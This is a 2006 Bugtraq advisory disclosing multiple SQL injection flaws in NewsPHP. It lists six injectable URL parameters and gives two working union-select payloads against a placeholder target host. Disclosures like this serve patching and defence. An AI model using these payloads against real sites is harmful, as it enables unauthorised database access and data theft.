[42435] in bugtraq
Newsphp Multiple SQL Injection Vulnerabilities
daemon@ATHENA.MIT.EDU (at)
Thu Jan 26 07:23:07 2006
Date: 22 Jan 2006 18:50:35 -0000
Message-ID: <20060122185035.23621.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: s3ude@securityfocus.com, hotmail.com@securityfocus.com (at)
To: bugtraq@securityfocus.com
Software: NewsPHP
Web Site: http://www.newsphp.com
Versions: All
Type: Multiple SQL Injection
Class: Remote
Exploit :
1-
http://www.target.com/index.php?discuss=SQL
2-
http://www.target.com/index.php?tim=SQL
3-
http://www.target.com/index.php?id=SQL
4-
http://www.target.com/index.php?words=%20&where=1&limit=40&last=SQL
5-
http://www.target.com/index.php?words=%20&where=1&limit=SQL
6-
http://www.target.com/index.php?words=&where=1&submitted=true&address=E-mail+Address&action=add&rate=5&id=(SQL)&article_rate=Rate
Example :
1-
http://www.target.com/ndex.php?id=-99 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*
2-
http://www.target.com/index.php?tim=-1 union select null,null,null,null,null,null,null,null,null from newsphp.pro/*
Discovered by: SAUDI
L-G-H Team
http://www.lezr.com
Regards ///
